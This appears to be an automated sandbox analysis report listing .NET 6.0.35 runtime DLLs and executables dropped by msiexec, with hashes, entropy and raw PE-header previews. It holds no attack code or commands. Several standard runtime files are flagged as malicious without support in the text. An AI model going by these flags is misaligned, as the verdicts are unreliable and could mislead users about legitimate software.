                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:DA2uWYFxEpahrWvhW/nWYnO/VWQ4mWSmRkH2vArqnajKsbTYMlBzK:DIFVhrWvhWfUERkH24rlGsbTYx
                                                                                                                                                                                                                                                                                                                                  MD5:306608A878089CB38602AF693BA0485B
                                                                                                                                                                                                                                                                                                                                  SHA1:59753556F471C5BF1DFEF46806CB02CF87590C5C
                                                                                                                                                                                                                                                                                                                                  SHA-256:3B59A50457F6B6EAA6D35E42722D4562E88BCD716BAE113BE1271EAD0FEB7AF3
                                                                                                                                                                                                                                                                                                                                  SHA-512:21B626E619AAF4EDA861A9C5EDF02133C63ADC9E893F38FEDE72D90A6E8BE0E566C117A8A24CA4BAB77928083AE4A859034417B035E8553CC7CCFB88CB4CBD9C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...+b............" .........@...............................................P......'l....`A........................................P...a............@...............@...!..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-string-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25040
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.075489018611419
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:dozmT5yguNvZ5VQgx3SbwA71IkFPaPA6XHPe:dozmT5yguNvZ5VQgx3SbwA71IAaP7XH2
                                                                                                                                                                                                                                                                                                                                  MD5:EC1381C9FDA84228441459151E7BADEA
                                                                                                                                                                                                                                                                                                                                  SHA1:DB2D37F3C04A2C2D4B6F9B3FD82C1BE091E85D2C
                                                                                                                                                                                                                                                                                                                                  SHA-256:44DDAB31C182235AC5405D31C1CBA048316CC230698E392A732AC941EC683BAD
                                                                                                                                                                                                                                                                                                                                  SHA-512:EE9EBBDC23E7C945F2B291FDE5EB68A42C11988182E6C78C0AB8FA9CB003B24910974A3291BCDAA0C8D1F9DFA8DF40293848FB9A16C4BE1425253BED0511A712
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d....w.e.........." .........@...............................................P......0.....`A........................................P................@...............@...!..............p............................................................................rdata../........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-time-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.000234308172749
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:SNDKWvhW/WYnO/VWQ4mWVx2RoXEKup3JdqnajKsztg/J:RWvhWvUexqoX7aJdlGsztgx
                                                                                                                                                                                                                                                                                                                                  MD5:4CF70855444F38E1EB71F9C3CD1C6E86
                                                                                                                                                                                                                                                                                                                                  SHA1:D06AEC4008D397756EE841F0E7A435D1C05B5F07
                                                                                                                                                                                                                                                                                                                                  SHA-256:A409E25A9D3C252CC0A5AF9DF85D3733E946087B06CD1FB2CF1BF640EB0D49BA
                                                                                                                                                                                                                                                                                                                                  SHA-512:A13A80645E679343AC5638E8AA6A03012F16200CB3A4637BE52A01AA3BEF854324A8ED1882CA91B304B9C47B6351B1FC1671F4DEDE5BE77BC208A71FE6029064
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d.....p..........." .........0...............................................@............`A........................................P................0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-utility-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.5308703760687745
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:6PjfHQduHWvhWjWYnO/VWQ4mWEwXBXEKup3JdqnajKsztqOT+:QfxWvhWjUoXBX7aJdlGsztqx
                                                                                                                                                                                                                                                                                                                                  MD5:FCD6B29932D6FB307964B2D3F94E6B48
                                                                                                                                                                                                                                                                                                                                  SHA1:BE560F8A63C8E36A7B3FA48FF384F99F69A5D4F7
                                                                                                                                                                                                                                                                                                                                  SHA-256:CFB2EE4E426BB00B76163C1A66CF8CFEF8D7450CBF9BBCE3BC9EB2053F51E0E5
                                                                                                                                                                                                                                                                                                                                  SHA-512:3EDFCF559F1E21870277358E6D266A1A0CEA68B163B11C73108F3B6A56006D20B51410A3B4EA39BF80906BF6C9D573E1072697CFCD6A3D37E3679EA54757C69F
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...w............." .........0...............................................@............`A........................................P...^............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\clretwrc.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):304912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.237308620636253
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:sQX9Xit++0PJSKtOJsgI3mwNdmLZ8mTQfsqxs0w:X9xacWIfsq6T
                                                                                                                                                                                                                                                                                                                                  MD5:7A6F920B2A26507F381C9926FF3955E9
                                                                                                                                                                                                                                                                                                                                  SHA1:3ACB49A2097FDC6DAB19D855CC9E926CEF2CC991
                                                                                                                                                                                                                                                                                                                                  SHA-256:ACC3E8888821897CFA2175C1B6FA244D3F8F3B9C19C7D10D13ABB2B5DBF0BD31
                                                                                                                                                                                                                                                                                                                                  SHA-512:300056DAF903C41155A9CC21FA50580F5730978B052BA3E1437DFFE21BA4BF8B85DD56BE64C4DAC38317497B5E06136CA7FF7FA2C569A79D93641A1ACCEC8DA9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j=.I.S.I.S.I.S..~..H.S..~Q.H.S.RichI.S.PE..d...0..f.........." .........|...........................................................`.......................................................... ..xx...........~...)..............T............................................................................rdata..X...........................@..@.rsrc...xx... ...z..................@..@....0..f........l...l...l.......0..f........................0..f........l...................................RSDSu{1^E..G...(.u......D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\clretwrc\clretwrc.pdb.............................T....rdata..T........rdata$voltmd...l........rdata$zzzdbg.... .......rsrc$01.....!..hw...rsrc$02....................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\clrjit.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1436960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.484129501687899
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:5Ltbu58TIu2rlMBDr0PZYRhVj95f1L7Zr5/z/5ccUYXIBXzkTVsHgWolUZbGfqfZ:5LtHAcX0PZuhVDh7ZN7/6YXIBjkBsHgA
                                                                                                                                                                                                                                                                                                                                  MD5:1B4D16976D164450EE4353CEAB9D2FB3
                                                                                                                                                                                                                                                                                                                                  SHA1:D23DA40ABDF340AD7EB4BDFE236A2958734B9187
                                                                                                                                                                                                                                                                                                                                  SHA-256:F3B3025DA537F2CDDCBEA252F3B9FD806059E1E780388AF1F17717A08A88B31D
                                                                                                                                                                                                                                                                                                                                  SHA-512:D542C07705357B4F14FECEBB741C1A350CFE4DC1D62E798FA3D2BE454B5F6F36C679382EEAAE870A19F0BD4CA0C17015C095B449B3FA8B2DE4110DDF134678D2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2.US..US..US..\+..YS...!..RS..US...S...&..tS...&..[S...&..\S...&..>S...&..TS...&y.TS...&..TS..RichUS..........................PE..d...a..f.........." .....,................................................... ............`A............................................t....................0..@....... )......|.......p....................k..(...@...8............@...............................text....*.......,.................. ..`.rdata.......@.......0..............@..@.data....<..........................@....pdata..@....0......................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..|...........................@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\coreclr.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):5125384
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.552501447077918
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:gRRteSC8CjfXq6EoB/CEsRfJSa3Ed9A6oWUqCJ0OTVRSpih8IdCdTWOwxJ4aXmnF:oRqXB/CEA8JspP8LK1XHy
                                                                                                                                                                                                                                                                                                                                  MD5:3BAD185FF9C97D6BF3721BB5FCF94C93
                                                                                                                                                                                                                                                                                                                                  SHA1:C58124BAF2437902C1D1F2F955160D0976775F85
                                                                                                                                                                                                                                                                                                                                  SHA-256:AEC87D2F91D6A44DBA90F9BDEB7B3509D5A2C322E29A17CF29BCCEAE9092B6D9
                                                                                                                                                                                                                                                                                                                                  SHA-512:38639C67D78491074BB755177849A4E54EF9DF77E6CDF2EBAE3049D121A8AAB0987D5B442728CB05CC3B392112D298F6469E5E8256037B1BD1AADF897887E79F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../.*.Nuy.Nuy.Nuy.6.y.Nuyj<qx.Nuyj<tx.Nuy.Nty.Ouy.;px.Nuy.;qx.Nuy.;vx.Nuys;vx.Nuys;{xlOuys;ux.Nuys;.y.Nuys;wx.NuyRich.Nuy................PE..d......f.........." ......<...................................................O.......N...`A.........................................LI.D...TMI......`O...... K.8.....N..)...pO.Ta....>.p.....................?.(...p.=.8.............<......JI.`....................text...a.<.......<................. ..`.CLR_UEF\.....<.......<............. ..`.rdata........<.......<.............@..@.data... .....I..:...PI.............@....pdata..8.... K.......I.............@..@.didat..8.....N......hL.............@...Section.......N......jL.............@..._RDATA...3... N..4...lL.............@..@.rsrc........`O.......M.............@..@.reloc..Ta...pO..b....M.............@..B........................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\createdump.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):58208
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.336737113725061
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:BIkf5nMEPz7omzpq/4Jw1AsDZq7v653eUu8su9WWD9zWVV:3n5tLX626u8b9WWpzWVV
                                                                                                                                                                                                                                                                                                                                  MD5:555F420D213590062A1EA6CCBA22FF93
                                                                                                                                                                                                                                                                                                                                  SHA1:1D0FCFAAE1FF46B8CC13AFF0BC8B23E8B6744061
                                                                                                                                                                                                                                                                                                                                  SHA-256:679EF868F8A1792862D066DE2E4A6DC2581F8EA1B449A27700D0ABD41F305840
                                                                                                                                                                                                                                                                                                                                  SHA-512:0CD0FEBCC0DE9F3C7A061FF667F9DCAA42708D12D94BB24C5452E7AFD81588AEB914FA9F7BADA471FBE35AAB86A329D22D00B7A7053EDC8BEAE24F8BE104E99C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l............uU.....x.....x.....x.................x.....x9.....x....Rich...........PE..d......f.........."......h...N.......).........@..........................................`....................................................................P.......`)......h.......T...............................8............................................text....f.......h.................. ..`.rdata...6.......8...l..............@..@.data...............................@....pdata..P...........................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\dbgshim.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):140552
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.417221597504487
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:/XY8Ja8dy1+iLfBcGPUZZceOiU8mJ/QQc962jqc413OygrxkwFOZiLazze:fLgDL+vU8mpcoOygrxk7Z1ne
                                                                                                                                                                                                                                                                                                                                  MD5:EB426FB0169349BD00996AD44A4DBCFB
                                                                                                                                                                                                                                                                                                                                  SHA1:E4310867F2A65106E8651B6896C6874C86DC5D9D
                                                                                                                                                                                                                                                                                                                                  SHA-256:7E71B48980907AD28B686454DBBD7AFFEB31EB5D0D483F10726318E78C2FA697
                                                                                                                                                                                                                                                                                                                                  SHA-512:CA18E9C294180E8B541E0B60EA1EA82F9E96E9FBD00512A183DF4FF02AC305572D7036C03CD222DE048E9D1F1AA3A8AC0CC479FEA21F8772F11CF62272EB8276
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@.......................+.......*.......-......./......./.{.....'......................,.....Rich....................PE..d...8..f.........." .....^..........P........................................P......b.....`A............................................(...(........0..........|........)...@..........p.......................(... ...8............p...............................text....\.......^.................. ..`.rdata..Tx...p...z...b..............@..@.data...............................@....pdata..|...........................@..@_RDATA....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\hostpolicy.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):394504
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.310874586526877
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:HBGjtNkrBCdJeD1QL3sQy8XyV0l0gzPI37VPzBzrBUh9epO1BE/XW9X:HBGjtNkU/rsQy8XyxnQaO0XW9X
                                                                                                                                                                                                                                                                                                                                  MD5:E91B1F5F3C422A8FABD79B2AB60D7534
                                                                                                                                                                                                                                                                                                                                  SHA1:24EA312FFA45D6611A4A487F7BD8185BF9E62F56
                                                                                                                                                                                                                                                                                                                                  SHA-256:3F08B69309BFE4B910D35AE6739EE8F650CB94428AE546222038DECD7BF102F7
                                                                                                                                                                                                                                                                                                                                  SHA-512:8E8B028123A710661CDD68F46A789186E3D73E8946B92582695D8A006854C92994DEBCD461E723EBC04E62499903D617B5D7568F20D79452FAF2ACCB21086200
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ux.U..YU..YU..Y.a.X_..Y.a.X_..Y.a.X...Y\l.YG..Y.f.XP..YU..Y...Y.a.XH..Y.a.XT..Y.a.YT..Y.a.XT..YRichU..Y........PE..d......f.........." .....D...................................................@............`A............................................ ... ........ ..........$0.......)...0..........p.......................(.......8............`...............................text...,B.......D.................. ..`.rdata...F...`...H...H..............@..@.data...............................@....pdata..$0.......2..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscordaccore.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1320504
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.3740433775574274
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:I3ccAqMv7jLs0eJqwnSA/RSwn20qv6InSITDH4Pecta:I7s7jsjS4znnqyIn7TrRUa
                                                                                                                                                                                                                                                                                                                                  MD5:5D5D12336DA85008B37919C795C56607
                                                                                                                                                                                                                                                                                                                                  SHA1:30F93505D325EFB2674C5F18CBD7603C0544F0EA
                                                                                                                                                                                                                                                                                                                                  SHA-256:70252416E6CB744F36B84AA3834C0EE9DFC3527EE97133DDD6AED0A2F178201C
                                                                                                                                                                                                                                                                                                                                  SHA-512:CC913259E618514AB7C7779C846C36E394CEF0EEA344DB1B9DB90B796525CD9F53987D927FDA94B28AB5E73B68FB9F258FDB5FE041B32D59AFFCB4E444AAE8C4
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......eK.!*..!*..!*..(R..+*..s_...*..s_...*..s_..+*...X..%*...X..**..!*..*..._..*..._.. *..._B. *..._.. *..Rich!*..........................PE..d...v..f.........." .....(...................................................P............`A............................................p...`........ .......`..........8&...0..P...`d..p....................f..(....d..8............@...............................text....'.......(.................. ..`.rdata.......@.......,..............@..@.data....!...0......................@....pdata.......`.......*..............@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc..P....0......................@..B................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscordaccore_amd64_amd64_6.0.3524.45918.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1320504
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.3740433775574274
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:I3ccAqMv7jLs0eJqwnSA/RSwn20qv6InSITDH4Pecta:I7s7jsjS4znnqyIn7TrRUa
                                                                                                                                                                                                                                                                                                                                  MD5:5D5D12336DA85008B37919C795C56607
                                                                                                                                                                                                                                                                                                                                  SHA1:30F93505D325EFB2674C5F18CBD7603C0544F0EA
                                                                                                                                                                                                                                                                                                                                  SHA-256:70252416E6CB744F36B84AA3834C0EE9DFC3527EE97133DDD6AED0A2F178201C
                                                                                                                                                                                                                                                                                                                                  SHA-512:CC913259E618514AB7C7779C846C36E394CEF0EEA344DB1B9DB90B796525CD9F53987D927FDA94B28AB5E73B68FB9F258FDB5FE041B32D59AFFCB4E444AAE8C4
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......eK.!*..!*..!*..(R..+*..s_...*..s_...*..s_..+*...X..%*...X..**..!*..*..._..*..._.. *..._B. *..._.. *..Rich!*..........................PE..d...v..f.........." .....(...................................................P............`A............................................p...`........ .......`..........8&...0..P...`d..p....................f..(....d..8............@...............................text....'.......(.................. ..`.rdata.......@.......,..............@..@.data....!...0......................@....pdata.......`.......*..............@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc..P....0......................@..B................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscordbi.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1268256
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.353781583662467
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:ZZdZVbcj9cSuINr2JeOayeFbpo7iE8o3c:LdZVbe9dNVOay8be7iTo3c
                                                                                                                                                                                                                                                                                                                                  MD5:04520F980CDAE284E8E277A5EEEEDDE0
                                                                                                                                                                                                                                                                                                                                  SHA1:553717161DB99170BF43A552F5ADE7D62D595C88
                                                                                                                                                                                                                                                                                                                                  SHA-256:0D2BAD6FB84641FB0C314A885A43659733A2FFE4FD30038D686D8943215085CD
                                                                                                                                                                                                                                                                                                                                  SHA-512:B6931CA1FB8E15E3EADA725477786CEFF1A5AC92A2BB6E6350BF826EB416E5E1CE1BB5F545C926EE86AC21B25F8B7569486F9A92E0BD237088482A9A5AE948A2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........g.jy4.jy4.jy4...4.jy4..|5.jy4..}5.jy4..z5.jy4'.}5.jy4'.x5.jy4.jx4:jy4>.z5.jy4>.p5.jy4>.y5.jy4>..4.jy4>.{5.jy4Rich.jy4................PE..d...o..f.........." .....n................................................................`A.........................................n..`....p.......`..........D....4.. &...p......`...p.......................(......8............................................text...5l.......n.................. ..`.rdata...............r..............@..@.data...x............t..............@....pdata..D...........................@..@_RDATA.......P......................@..@.rsrc........`......................@..@.reloc.......p......................@..B................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscorlib.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):58664
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.651805521522887
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:v8zO+8uP8x/A15A4HI4gJl01Qa7ICltVtYFClobY9zJQ+M:kzO+8uA/A15A4o4gJq1DI+tEi4QzmH
                                                                                                                                                                                                                                                                                                                                  MD5:FBB5BF650AAEA448D918B2CEFE709039
                                                                                                                                                                                                                                                                                                                                  SHA1:D9A7B45DD8F22D24089DE96559D3BAC4D431FA47
                                                                                                                                                                                                                                                                                                                                  SHA-256:060AEFDEBF10E01A664A63C4330137DA0C0CC9F01A82E1FB09981E0369A7D365
                                                                                                                                                                                                                                                                                                                                  SHA-512:F34556DBA9EA69FCE8BC2D0EB95AB16048EEC1603F7CC9107F4ADE445A0694FE35DF120D21A42DA44B2516839191912E29CDA88685E67F5E2AD02DC9CE98128D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...<............." ..0.................. ........... ....................... ............`.................................l...O.......(...............()..............T............................................ ............... ..H............text....... ...................... ..`.rsrc...(...........................@..@.reloc..............................@..B........................H.......P .............................................................BSJB............v4.0.30319......l...pL..#~...L..._..#Strings............#US.........#GUID...........#Blob............T.........3....................................,.....*-.........#.M...&.M.....M...M....h..)...$'....".2.....2...&.2..v$.2... .2.....2.....2...$.2..x..2...1.S.....S..5..]...$.M.................L.....L.....L..)..L..1..L..9..L..A..L..I..L..Q..L..Y..L..a..L..i..L..q..L..y..L.....L ....L.....L..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscorrc.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):147120
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8679598076564816
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:ZtgZms10iHvh7x8SKJlZ4vCCk7nw55IvZ4MgSZctpoEXXRWfzy:ZtgZ/aSKlZ4ZGnwmUS4ScRg2
                                                                                                                                                                                                                                                                                                                                  MD5:354AF4403A04CA4CAF359981635D08D4
                                                                                                                                                                                                                                                                                                                                  SHA1:A447720776EE112E45E08CFF574123A54ABD4A08
                                                                                                                                                                                                                                                                                                                                  SHA-256:15B115DEC61C47C0C10C49E98513EA8E4C83A9E2FC1F562F30FDB2CC1F620643
                                                                                                                                                                                                                                                                                                                                  SHA-512:BAABAB57981A6E7476FD9716FDB34585A5AA443067E2BFAADB0A79F2F7AAFFA31DEAD4B5559E43327EA0E3AE4A89CF131245C6C5852334906D0CC465E51F2230
                                                                                                                                                                                                                                                                                                                                  Malicious:true
